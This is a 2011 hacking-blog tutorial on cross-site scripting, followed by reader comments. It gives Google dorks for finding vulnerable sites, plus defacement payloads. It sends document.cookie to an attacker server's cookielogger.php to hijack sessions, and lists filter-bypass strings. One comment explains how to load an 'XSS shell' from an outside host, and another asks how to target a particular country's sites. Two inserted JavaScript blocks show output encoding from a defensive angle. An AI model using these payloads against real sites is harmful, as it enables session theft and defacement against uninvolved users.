Feb 16, 2011

A Complete Tutorial On XSS (cross site scripting)

Welcome to another lesson, in which I will be covering XSS.

Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
XSS (Cross Site Scripting; older texts abbreviate it 'CSS', which is easily confused with Cascading Style Sheets) is one of the most common vulnerabilities found in web applications. It occurs when an application copies attacker-controlled input into a page without encoding it, so the attacker's HTML or JavaScript runs in other users' browsers with the privileges of the vulnerable site. There are several variants; this lesson covers the three you will meet most often.

1- 'URL XSS' (reflected XSS through the query string): the payload does not stay on the page. It only runs when a victim loads a URL that carries the malicious code, so the attacker has to get the victim to open that link.

2- Input fields: wherever you can insert data that is echoed back to you is a candidate, and it is very common. Say we found a site with a search engine. Enter 'hacker' in the search box and hit enter; when the page loads it says something like 'Found 100 Results For hacker', so the site is displaying your data on the page. Now, what if that data contained code? There is no way to execute PHP with this attack (PHP runs on the server, see below), but HTML and JavaScript are parsed by the browser, and if the site did not encode your input they will run. This is still reflected XSS; the only difference from the first case is that the payload arrives through a form instead of a bare URL.

3- Stored (persistent) XSS: you INSERT data (code) that the site saves and shows to everyone who views the page afterwards. This kind of attack is normally found on blogs, shoutboxes, profiles and forums, anywhere you insert data and it stays there. Note the difference between HTML and PHP here. HTML is downloaded to the visitor's PC and then their browser parses/interprets it (that is why its source is viewable), so injected HTML and JavaScript run on every visitor's machine. PHP is interpreted on the server the script is hosted on, and only its output is returned to the browser, so injecting PHP source into a page's content never executes it. Note: PHP code cannot be injected into an HTML page; an application that lets you run PHP has a separate server-side code injection or file upload flaw, not XSS.

Finding XSS Vulnerabilities
To start finding these vulnerabilities, check the places that echo user input: blogs, forums, shoutboxes, comment boxes, search boxes and many similar things.

'Google Dorks' make the finding easier. If you want to get cracking, go to Google.com and type
inurl:"search.php?q=" which is a common page name with a lot of results. Now let's move on to the next part.

The Basics On XSS

The most used XSS injection is

<script>alert("XSS")</script>

If the site is vulnerable this pops up an alert box saying XSS. It is easily editable, which means you can also inject
<script>alert("your name or message")</script>
Going back to the Google dork I gave you, search.php?q=
we will use this to check for vulnerabilities.

To check whether it is vulnerable we request

www.site.com/search.php?q=<script>alert("your name or message")</script>

If the page copies the parameter into its HTML without encoding it, the browser shows the alert popup. If no alert appears, view the page source and find where your input landed: it may have been encoded (&lt;script&gt;) or placed in a context, such as an attribute or an existing script, that needs a different payload.

Many times this works, but if it does not work, don't cry, we have another way. :P

You can try injecting HTML ;)

You can use these two strings to inject HTML:

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our URL will be

www.site.com/search.php?q=<h1>anything you want</h1>
or
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text and the new lines rendered on the page, you know it is vulnerable: the site inserts your input into the page as markup, and anything that can inject markup can inject a script.
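The reflection point described above, as an added example that is not part of the original post, written in JavaScript (Node.js) rather than PHP so it runs anywhere: a search page that echoes the q parameter the way a vulnerable search.php does, the same page with output encoding, and the check a tester runs to tell the two apart. The function names, the probe string and the sample inputs are all made up for this example.

```javascript
// Added example, not code from the original post. Simulates search.php?q=
// in Node.js: vulnerable rendering, encoded rendering, and the probe check.

// Vulnerable: the query is concatenated straight into the HTML response.
// This is exactly what a reflected-XSS-prone search page does.
function renderSearchPageVulnerable(q, hits) {
  return `<html><body><h2>Found ${hits} Results For ${q}</h2></body></html>`;
}

// Encode the five characters that let text escape an HTML text/attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Fixed: same page, but the untrusted value is encoded before insertion.
function renderSearchPageSafe(q, hits) {
  return `<html><body><h2>Found ${hits} Results For ${escapeHtml(q)}</h2></body></html>`;
}

// A harmless but unambiguous probe (hypothetical choice): if it comes back
// byte-for-byte, the page is not encoding output. It avoids the word "XSS",
// which some sites filter as a keyword rather than filtering the markup.
const PROBE = '<u>zxcv</u>';

// The check a tester actually runs: does the raw probe survive in the response?
function reflectsUnescaped(html, probe = PROBE) {
  return html.includes(probe);
}

// Constructed inputs standing in for what a browser would send in the q parameter.
// 'hacker' contains nothing to encode, so it reflects identically in both pages.
const payloads = [
  'hacker',
  '<script>alert("zxcv")</script>',
  '<h1>anything you want</h1>',
  PROBE,
];

// Run every payload through both renderers and report whether it survived raw.
function demo() {
  const results = [];
  for (const q of payloads) {
    results.push({
      q,
      vulnerable: reflectsUnescaped(renderSearchPageVulnerable(q, 100), q),
      fixed: reflectsUnescaped(renderSearchPageSafe(q, 100), q),
    });
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of demo()) console.log(r);
}
```

Note that the check is on the raw response body, not on whether an alert appeared: a page can be vulnerable and still show no popup because the payload landed in an attribute or inside an existing script, which is what the filtration section later deals with.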

Deface Methods
Now that you understand how XSS works, we can explain some simple XSS deface methods. There are many ways of defacing; I will mention some of the best and the ones I used most.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

The first one is IMG SRC. For those of you who don't know HTML, IMG is a tag that displays the image its SRC attribute links to on the web page.

If you change the link to a valid picture link, save this as an .html file and open it, you will see your deface page.

Let's say we have found a shoutbox, comment box, or anything that shows your data after you submit it. You could insert the following to make the picture display on the page:

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

It helps to make your picture big so it stands out and it is clear the site got hacked.

Another method is using Flash videos. It is the same as the image method above, but a little more stylish.

<EMBED SRC="http://site.com/xss.swf">

That will play the Flash movie linked to it. (Current browsers no longer ship a Flash plugin, so this only worked at the time of writing.)

Now a popup or a redirection:

<script>window.open( "http://hacking-class.blogspot.com" )</script>

Popup blockers suppress window.open unless it happens in response to a user click; for a redirect that always fires, set window.location instead, as in the next section.

Cookie Stealing

This is the best thing about XSS: with the victim's session cookie you can act as that user without knowing their password.

First get yourself a cookie stealer from here

Save it as a .php file and upload it to your server. Remember to create the file 'log.txt' too and make it writable by the web server. The usual advice is chmod 777, but on a shared host that makes the log world-readable and world-writable, so keep it outside the web root or restrict it to the web server's user. Now find an XSS vulnerable website; any attack type will do.

Now you want to insert this code:

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

When a user visits the injected page they are sent to your server and their cookie is logged. The two lines do the same thing: document.location and window.location both navigate the browser, so the victim sees the redirect either way (the logger should at least send them back to the original site). A quieter variant requests the logger URL as an image (new Image().src = ...) so the page never changes. Two caveats: document.cookie only exposes cookies that were set without the HttpOnly flag, so a site that marks its session cookie HttpOnly gives you nothing here, and the cookie value should go through encodeURIComponent, otherwise a cookie containing '&' or '+' is corrupted in the query string.

Now it is time to hijack the cookies. The JavaScript must be wrapped in script tags, otherwise the page just prints it as text:

http://site.com/search.php?q=<script>document.location="http://yourServer.com/cookielogger.php?c="+document.cookie</script>
Filtration Bypassing

A lot of sites may seem vulnerable but do not execute the code. This will help you.

First understand why: where your input lands in the page decides which payload works. If it is copied into the HTML body, <script>...</script> works. If it is copied into a JavaScript string inside an existing <script> block, for example doSearch('YOURINPUT'), then script tags are useless (they are just characters inside a string), but you can close the string and the function call yourself.

Some common methods to bypass filtration are

');alert('xss');//

or, if the string is double-quoted,

");alert('xss');//

The trailing // comments out the leftover ');' so the script still parses; without it the browser reports a syntax error and nothing runs. On a vulnerable server that does the same thing as <script>alert("XSS")</script>.

You can also try hex (URL) encoding or base64 encoding your data before you submit it. This only helps when the filter checks the raw input but the application decodes it before use.

Please note it is bad practice to use alert("XSS") to test for XSS, as I have known sites to block the keyword XSS before.

Some other ways to bypass filtration:

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert(/saurav/)</script>

The last one passes a regular expression literal instead of a string, which gets past filters that strip quote characters.
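Why the string-breaking payload works where the script tag does not, as an added example that is not part of the original post: a page that copies the search term into an existing script as doSearch('TERM'), a crude tag filter of the kind being bypassed, and a runtime check that actually executes the generated script with stub alert and doSearch functions. The template, the sink name, the filter and the stubs are all made up for this example.

```javascript
// Added example, not code from the original post. Shows the JavaScript-string
// context: script tags are inert there, closing the string is not.

// Vulnerable: the term is dropped into a JavaScript string literal unchanged.
function renderScriptVulnerable(term) {
  return `doSearch('${term}');`;
}

// Fixed: JSON.stringify produces a valid JS string literal and escapes quotes
// and backslashes; the extra replace keeps '</script>' from ending the block.
function renderScriptSafe(term) {
  const literal = JSON.stringify(term).replace(/</g, '\\u003c');
  return `doSearch(${literal});`;
}

// Crude tag filter of the kind the bypass is aimed at (hypothetical).
function stripScriptTags(s) {
  return s.replace(/<\/?script[^>]*>/gi, '');
}

// Execute the generated script with stub alert/doSearch and report whether
// alert fired. A static string comparison cannot tell you this.
function executeAndCount(script) {
  let alerts = 0;
  let searched = null;
  const alertStub = () => { alerts += 1; };
  const doSearchStub = (t) => { searched = t; };
  try {
    new Function('alert', 'doSearch', script)(alertStub, doSearchStub);
  } catch (e) {
    // A SyntaxError here means the payload broke the script without running it.
    return { alerts, searched, error: e.constructor.name };
  }
  return { alerts, searched, error: null };
}

// Filter the term the way the site would, render it, run it.
function probe(term, render) {
  return executeAndCount(render(stripScriptTags(term)));
}

// Constructed payloads: the body-context classic and the string-context breakout.
const TAG_PAYLOAD = '<script>alert("zxcv")</script>';
const STRING_BREAK = "');alert('zxcv');//";

function demo() {
  return {
    tagAgainstVulnerable: probe(TAG_PAYLOAD, renderScriptVulnerable),
    breakAgainstVulnerable: probe(STRING_BREAK, renderScriptVulnerable),
    breakAgainstSafe: probe(STRING_BREAK, renderScriptSafe),
    // The post's original form without the trailing //: a syntax error, so nothing runs.
    breakWithoutComment: executeAndCount(renderScriptVulnerable("');alert('zxcv');")),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Two things to take from running it: the tag payload never fires in this context whether or not the filter strips it, and the breakout fires only against the vulnerable renderer, because JSON.stringify turns the attacker's quote into an ordinary character inside the literal.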

Hope that helped you


Happy Hacking

15 comments:

Great tutorial buddy, keep up the good work :)

Post an article on Advanced XSS

one vulnerable site for this is this

hi great article...thanks for writing. I have 2 questions.
1) how do you find xss vulnerable sites of a particular country (like israel)??? I mean, is there any google dork with which we can search only the vulnerable sites of a particular country????
2) I have a bit of a problem with "shell"..how do you upload a shell and how do you make a shell an image file????
Hope u will answer..

can u post a tut .... how to set up an xss shell.. plzzz

Muhammad

1. Upload XSS shell to a free web host.
2. On the XSS vulnerable site, use <script src="http://www.yoyo.com/xssshell.asp"></script> or whatever in the XSS vulnerable field.

Shell - http://www.darknet.org.uk/2006/12/xss-shell-v039-cross-site-scripting-backdoor-tool/

Hi,

Thanks for this tutorial, it explains XSS very well, but what I am confused about is, how is any of the malicious script passed onto the website?

All I can see is that they are getting executed at the client side, from where data can be stolen, but how is this script making its way into the vulnerable sites? Say for example I use a google dork on a vulnerable site and say steal cookies, it will steal cookies from my browser from where I am executing it, how will other users be affected by it? unless of course they are using my browser, and my script/code.

http://www.go4expert.com/forums/showthread.php?t=17066 This will help you understand it in more details.

Thank you.

XSS can be prevented by simply preventing the script tag; how to prevent xss will help you with more XSS security

I tested everything you mentioned. Nothing worked on my website, neither injecting script, nor the img, cookie, flash. Can you get in touch with me.
